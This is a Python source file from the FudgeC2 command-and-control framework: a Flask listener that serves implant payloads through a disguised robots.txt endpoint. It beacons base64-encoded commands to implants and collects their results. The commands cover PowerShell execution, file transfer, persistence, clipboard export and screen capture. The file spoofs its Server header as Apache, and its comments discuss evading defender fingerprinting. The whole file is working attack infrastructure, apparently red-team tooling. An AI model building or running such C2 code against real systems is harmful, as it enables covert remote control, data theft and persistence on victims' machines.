Codebase list fudgec2 / upstream/latest FudgeC2 / Listeners / HttpListener.py
upstream/latest

Tree @upstream/latest (Download .tar.gz)

HttpListener.py @upstream/latestraw · history · blame

from flask import Flask, request
import base64
from uuid import uuid4
import os

from Implant.Implant import ImplantSingleton
from Data.Database import Database

Imp = ImplantSingleton.instance
db = Database()

app = Flask(str(uuid4()))
app.config['SECRET_KEY'] = str(uuid4())


# Adding the functions which manage encoding built in commands for transfer
def craft_sound_file(value_dict, command_id):
    path = f"{os.getcwd()}/Storage/implant_resources/{value_dict['args']}"
    with open(path, 'rb') as file:
        audio = base64.standard_b64encode(file.read()).decode()
        final_audio = f"{value_dict['type']}{command_id}{audio}"
    return final_audio


def craft_powershell_native_command(args, command_id):
    a = base64.b64encode(args['args'].encode()).decode()
    b = args['type']+command_id + a
    return b


def craft_file_upload(value_dict, command_id):
    # Temp dev work:
    arg_dict = value_dict['args'].split(" ")
    local_file = arg_dict[0]
    target_location = arg_dict[1]
    with open (os.getcwd()+"/Storage/implant_resources/"+local_file, 'rb') as file_h:
        a = file_h.read()
        b = base64.b64encode(a).decode()
        final_str = base64.b64encode(target_location.encode()).decode()+"::"+b
        final_str = base64.b64encode(final_str.encode()).decode()
    cc = str(value_dict['type'] + command_id) + final_str
    return cc


def craft_file_download(value_dict, command_id):
    encoded_target_file = base64.b64encode(value_dict['args'].encode()).decode()
    to_return = f"{value_dict['type']}{command_id}{encoded_target_file}"
    return str(to_return)


def craft_enable_persistence(value_dict, command_id):
    return str(value_dict['type'] + command_id)


def craft_sys_info(value_dict, command_id):
    return str(value_dict['type'] + command_id)


def craft_export_clipboard(value_dict, command_id):
    return str(value_dict['type'] + command_id)


def craft_load_module(value_dict, command_id):
    try:
        with open(str(os.getcwd()+"/Storage/implant_resources/modules/"+value_dict['args']+".ps1"), 'r') as fileh:
            to_encode = f"{value_dict['args']}::{fileh.read()}"
            load_module_string = "LM" + command_id + base64.b64encode(to_encode.encode()).decode()
            return load_module_string
    except Exception as e:

        # These exceptions should be added to a log file.
        print(f"Load module failed: {e}")
        pass
    return str("==")


def craft_invoke_module(value_dict, command_id):
    a = base64.b64encode(value_dict['args'].encode()).decode()
    b = value_dict['type'] + command_id + a
    return b


def craft_list_modules(value_dict, command_id):
    return str(value_dict['type'] + command_id)

def craft_screen_capture(value_dict, command_id):
    return str(value_dict['type'] + command_id)

#
preprocessing = {
    "PS": craft_sound_file,
    "CM": craft_powershell_native_command,
    "UF": craft_file_upload,
    "FD": craft_file_download,
    "EP": craft_enable_persistence,
    "SI": craft_sys_info,
    "EC": craft_export_clipboard,
    "LM": craft_load_module,
    "IM": craft_invoke_module,
    "ML": craft_list_modules,
    "SC": craft_screen_capture
    }


@app.before_request
def before_request():
    # TODO: Implement IP whitelist and reject if connection if it is not a valid src IP.
    return


# Removing the Werkzeug header to reduce Fudges server fingerprinting.
@app.after_request
def alter_headers(response):
    response.headers['Server'] = "Apache/2.4.1 (Unix)"
    return response


# -- TODO: extracted and added into a new stager specific listener(?)
@app.route("/robots.txt", methods=['GET'])
def stager():
    # This endpoint is responsible for generating the implant based on stager callbacks
    implant_data = db.implant.Register_NewImplantFromStagerKey(request.values['user'])
    if implant_data:
        output_from_parsed_template = Imp.GeneratePayload(implant_data)
        return output_from_parsed_template
    else:
        return "404", 404


@app.route("/index", methods=["GET", "POST"])
def implant_beacon_endpoint():
    if 'X-Implant' not in request.headers:
        return "=="

    next_cmd, command_id = Imp.issue_command(request.headers['X-Implant'], app.config['listener_type'])
    if next_cmd is not None:
        processed_return_val = preprocessing[next_cmd['type']](next_cmd, command_id)
        return processed_return_val
    # Need to remove the use of == in beacons, this can be fingerprinted with ease.
    return "=="


@app.route("/help", methods=['GET', 'POST'])
def implant_command_result():
    # -- X-Result is a placeholder header and should be changed to a more realistic value
    response_stream_data = request.stream.read()
    decoded_response_stream_data = response_stream_data.decode()
    if "X-Result" in request.headers:

        command_id = decoded_response_stream_data[0:24]
        encoded_command = decoded_response_stream_data[24:]
        decoded_response = base64.b64decode(f"{encoded_command}==")
        Imp.command_response(command_id, decoded_response, app.config['listener_type'])
    return "=="


# This should be randomised to avoid blueteams fingerprinting the server by querying this endpoint.
@app.route("/nlaksnfaobcaowb", methods=['GET', 'POST'])
def shutdown_listener():
    if request.remote_addr == "127.0.0.1":
        shutdown_hook = request.environ.get('werkzeug.server.shutdown')
        if shutdown_hook is not None:
            shutdown_hook()


def shutdown():
    raise RuntimeError("Server going down")